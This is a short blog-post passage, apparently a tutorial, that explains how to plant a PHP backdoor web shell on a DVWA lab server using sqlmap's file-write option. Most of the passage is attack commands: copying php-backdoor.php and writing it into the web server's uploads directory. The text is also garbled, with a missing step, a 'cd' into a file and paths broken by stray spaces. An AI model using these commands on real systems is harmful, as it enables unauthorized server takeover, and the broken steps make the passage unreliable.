1. The first is whether to copy the URL belongs to the target, here when the target URL using GET metod we can directly copy, however when using POST metod we use burpsuite prior notice.
# cd /usr/share/webshell/php/php-backdoor.php
then move the file to the root directory
#cp php-backdoor.php / root /
3. We will install a backdoor file which we prepared earlier in the web with the command:
# sqlmap /root/dvwa.txt -l -p "id" --file-write = / root / php-backdoor.php --file-dest = / var / www / dvwa / hackable / uploads / php-backdoor. php
and if it appears like the image above means you have succeeded in planting a backdoor
Tidak ada komentar:
Posting Komentar